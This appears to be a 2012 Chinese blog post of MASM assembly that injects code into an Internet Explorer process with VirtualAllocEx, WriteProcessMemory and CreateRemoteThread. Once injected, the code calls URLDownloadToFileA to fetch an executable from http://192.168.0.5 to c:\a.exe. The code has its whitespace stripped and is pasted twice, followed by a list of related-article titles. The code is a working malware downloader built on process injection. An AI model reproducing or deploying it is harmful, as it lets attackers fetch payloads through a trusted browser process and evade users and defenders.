注入下载文件的代码到IE进程然后执行下载的文件
2012-07-15 22:39
567 查看
大家可能都用过网页szBufferdd20dup(0),0
piddd0
hProcessdd0
hThreaddd0
pCodeRemotedd0
path1db'c:\a.EXE',0
.const
szmsgdb'URLDownloadToFileA',0
userdlldb'Urlmon.dll',0
;szmsgdb'MessageBoxA',0
;userdlldb'User32.dll',0
szloadlibdb'LoadLibraryA',0;注意和LoadLibraryW的区别哟
kerdlldb'kernel32.dll',0
.code
codebegin:
dispdatadb"http://192.168.0.5/NBTreeList.exe",0
szTitdb"c:\a.exe",0
datalen=$-codebegin
Rprocprocmsgbox;MessageBoxA的地址为参数
CALL@F;pushesi
@@:
POPEBX
SUBEBX,OFFSET@B
LEAECX,[EBX+dispdata]
LEAEDX,[EBX+szTit]
pushNULL
push0
pushedx
pushecx
pushNULL
callmsgbox
ret;重要
Rprocendp
codelen=$-codebegin;代码长度xx字节
start:
;invokeFindWindow,0,offsettit;返回计算器窗口句柄
invokeFindWindow,offsettit,0
invokeGetWindowThreadProcessId,eax,offsetpid;计算机器程序的进程PID号
;invokewsprintf,offsetszBuffer,offsetszFormat,pid;把PID用十进制显示
invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;打开进程,得到进程句柄
movhProcess,eax;保存进程句柄
invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE
movpCodeRemote,eax
invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL
movesi,pCodeRemote
addesi,datalen
pushesi
invokeLoadLibrary,offsetuserdll
invokeGetProcAddress,eax,offsetszmsg
popesi
invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0
movhThread,eax;返回线程句柄
.ifhThread
invokeWaitForSingleObject,hThread,INFINITE;等待线程结束
invokeCloseHandle,hThread;关闭线程句柄
.endif
invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;释放
piddd0
hProcessdd0
hThreaddd0
pCodeRemotedd0
path1db'c:\a.EXE',0
.const
szmsgdb'URLDownloadToFileA',0
userdlldb'Urlmon.dll',0
;szmsgdb'MessageBoxA',0
;userdlldb'User32.dll',0
szloadlibdb'LoadLibraryA',0;注意和LoadLibraryW的区别哟
kerdlldb'kernel32.dll',0
.code
codebegin:
dispdatadb"http://192.168.0.5/NBTreeList.exe",0
szTitdb"c:\a.exe",0
datalen=$-codebegin
Rprocprocmsgbox;MessageBoxA的地址为参数
CALL@F;pushesi
@@:
POPEBX
SUBEBX,OFFSET@B
LEAECX,[EBX+dispdata]
LEAEDX,[EBX+szTit]
pushNULL
push0
pushedx
pushecx
pushNULL
callmsgbox
ret;重要
Rprocendp
codelen=$-codebegin;代码长度xx字节
start:
;invokeFindWindow,0,offsettit;返回计算器窗口句柄
invokeFindWindow,offsettit,0
invokeGetWindowThreadProcessId,eax,offsetpid;计算机器程序的进程PID号
;invokewsprintf,offsetszBuffer,offsetszFormat,pid;把PID用十进制显示
invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;打开进程,得到进程句柄
movhProcess,eax;保存进程句柄
invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE
movpCodeRemote,eax
invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL
movesi,pCodeRemote
addesi,datalen
pushesi
invokeLoadLibrary,offsetuserdll
invokeGetProcAddress,eax,offsetszmsg
popesi
invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0
movhThread,eax;返回线程句柄
.ifhThread
invokeWaitForSingleObject,hThread,INFINITE;等待线程结束
invokeCloseHandle,hThread;关闭线程句柄
.endif
invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;释放
相关文章推荐
- 注入下载文件的代码到IE进程然后执行下载的文件
- 注入下载文件的代码到IE进程然后执行下载的文件
- 注入下载文件的代码到IE进程然后执行下载的文件
- 利用远程线程将代码注入到目标进程中执行
- Pe研究之:从内存中加载Pe文件(代码重定位,进程隐藏,代码注入)
- Java: IE & Firefox下载文件中文乱码的兼容代码
- php中强制下载文件的代码(解决了IE下中文文件名乱码问题)
- 一个网站登录,然后下载网页源代码和文件的代码
- spring mvc 避免IE执行AJAX时,返回JSON出现下载文件
- 避免IE执行AJAX时,返回JSON出现下载文件
- 百度搜霸工具条出现下载任意文件执行漏洞 含攻击代码
- 避免IE执行AJAX时,返回JSON出现下载文件
- 重定向已经运行进程的标准输出到文件的办法(通过ptrace注入代码到其他进程并运行)
- Pe研究之:从内存中加载Pe文件(代码重定位,进程隐藏,代码注入)
- spring mvc 避免IE执行AJAX时,返回JSON出现下载文件
- IE执行AJAX,返回JSon出现下载文件的解决方法
- 关于 文件下载--------代码没有报错,又不弹出下载框,执行下载无反应的问题
- 代码审计| phpcms 9.6.2 任意文件下载与前台SQL注入
- IE和火狐关于文件上传路径然后下载的问题(正常路径IE识别,火狐识别不出正常的路径)
- 避免IE执行AJAX时,返回JSON出现下载文件